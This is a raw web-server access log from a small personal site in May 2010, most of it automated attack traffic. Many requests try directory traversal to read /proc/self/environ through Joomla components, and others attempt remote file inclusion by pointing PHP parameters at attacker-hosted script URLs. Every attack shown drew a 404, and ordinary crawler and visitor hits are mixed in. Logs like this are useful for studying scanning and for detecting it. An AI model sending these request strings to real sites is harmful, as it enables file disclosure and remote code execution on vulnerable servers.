213.186.60.116 - - [30/May/2010:23:41:46 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:46 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
220.181.7.108 - - [30/May/2010:23:42:07 -0500] "GET /logs/access_log.1270857600 HTTP/1.1" 200 549473 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.7.27 - - [30/May/2010:23:42:18 -0500] "GET /logs/access_log.1270771200 HTTP/1.1" 200 681868 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
92.241.190.214 - - [30/May/2010:23:42:47 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
92.241.190.214 - - [30/May/2010:23:42:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
92.241.190.214 - - [30/May/2010:23:42:48 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
213.186.60.116 - - [30/May/2010:23:42:51 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:42:51 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.43.180.250 - - [30/May/2010:23:43:00 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:23:43:00 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:23:43:00 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
81.92.204.67 - - [30/May/2010:23:44:21 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:21 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:21 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:41 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:41 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:41 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:48 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:48 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:44:48 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:45:10 -0500] "GET /logs/access_log.1232668800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:45:12 -0500] "GET /logs/access_log.1232668800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.186.60.116 - - [30/May/2010:23:47:10 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:47:10 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.92.204.67 - - [30/May/2010:23:47:15 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:47:15 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:47:15 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:47:17 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:47:17 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:47:17 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.186.60.116 - - [30/May/2010:23:47:32 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:47:32 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:48:04 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:48:05 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
200.43.180.250 - - [30/May/2010:23:49:02 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
87.250.255.243 - - [30/May/2010:23:54:46 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.241.227.87 - - [30/May/2010:23:54:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""ia_archiver-web.archive.org"
200.61.185.200 - - [30/May/2010:23:55:02 -0500] "GET /logs/access_log.1274313600//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [30/May/2010:23:55:02 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [30/May/2010:23:55:08 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
213.186.60.116 - - [31/May/2010:00:00:42 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:00:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:01:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
195.190.166.35 - - [31/May/2010:00:01:59 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:00:01:59 -0500] "GET /logs/access_log.1205107200//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:00:01:59 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.195.112.180 - - [31/May/2010:00:02:18 -0500] "GET /logs/access_log.1197763200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.59 - - [31/May/2010:00:03:44 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.136.121.230 - - [31/May/2010:00:04:04 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.136.121.230 - - [31/May/2010:00:04:04 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.136.121.230 - - [31/May/2010:00:04:04 -0500] "GET /logs/access_log.1273363200%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:00:04:40 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:00:04:41 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.805"
67.195.112.180 - - [31/May/2010:00:06:38 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.127.70.140 - - [31/May/2010:00:07:04 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
119.12.55.53 - - [31/May/2010:00:13:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; HPNTDF; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; AskTB5.6)"
119.12.55.53 - - [31/May/2010:00:13:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; HPNTDF; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; AskTB5.6)"
119.12.55.53 - - [31/May/2010:00:13:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; HPNTDF; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; AskTB5.6)"
81.92.204.67 - - [31/May/2010:00:17:28 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:17:28 -0500] "GET /logs/access_log.1271635200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:17:28 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:00:17:50 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:17:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:18:21 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:18:22 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
208.115.111.248 - - [31/May/2010:00:19:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
213.186.60.116 - - [31/May/2010:00:19:17 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:19:19 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.204.184 - - [31/May/2010:00:19:26 -0500] "GET /logs/access_log.1196812800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.186 - - [31/May/2010:00:20:56 -0500] "GET /logs/access_log.1193788800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:00:22:04 -0500] "GET /logs/access_log.1227398400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.186.60.116 - - [31/May/2010:00:24:47 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:24:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:24:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.92.204.67 - - [31/May/2010:00:27:02 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:02 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:02 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:21 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:21 -0500] "GET /logs/access_log.1271635200//classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:21 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:25 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:25 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:25 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:26 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:26 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:26 -0500] "GET /logs/access_log.1271548800//classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:00:27:26 -0500] "GET /logs/access_log.1271635200//classes/adodbt/sql.php?classes_dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:30 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:30 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:30 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:43 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:43 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:27:43 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:00:27:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:27:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:28:01 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.92.204.67 - - [31/May/2010:00:28:10 -0500] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:28:10 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:00:28:10 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:00:29:27 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:29:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:29:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
200.61.185.200 - - [31/May/2010:00:30:19 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:00:30:19 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:00:30:19 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.127.70.140 - - [31/May/2010:00:30:53 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.127.70.140 - - [31/May/2010:00:30:54 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.127.70.140 - - [31/May/2010:00:30:54 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
213.186.60.116 - - [31/May/2010:00:30:59 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:31:01 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:31:03 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.204.238 - - [31/May/2010:00:31:26 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.7.185.19 - - [31/May/2010:00:32:25 -0500] "GET /logs/access_log.1232668800/cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
216.7.185.19 - - [31/May/2010:00:32:25 -0500] "GET /cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [31/May/2010:00:32:26 -0500] "GET /logs/cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.810"
87.250.255.243 - - [31/May/2010:00:33:16 -0500] "GET /costume/thmb5.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
213.186.60.116 - - [31/May/2010:00:34:38 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:34:38 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:34:40 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:34:43 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:35:20 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:35:21 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.204.188 - - [31/May/2010:00:35:26 -0500] "GET /costume/shipping.htm HTTP/1.1" 404 304 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.126.254.3 - - [31/May/2010:00:37:14 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.3 - - [31/May/2010:00:37:15 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
213.186.60.116 - - [31/May/2010:00:38:53 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.199.201 - - [31/May/2010:00:39:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [31/May/2010:00:40:12 -0500] "GET //adminhead.php?path[docroot]=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:00:40:19 -0500] "GET /logs//adminhead.php?path[docroot]=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:00:40:25 -0500] "GET /logs/access_log.1273017600%20%20//adminhead.php?path[docroot]=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:00:41:41 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:00:41:46 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
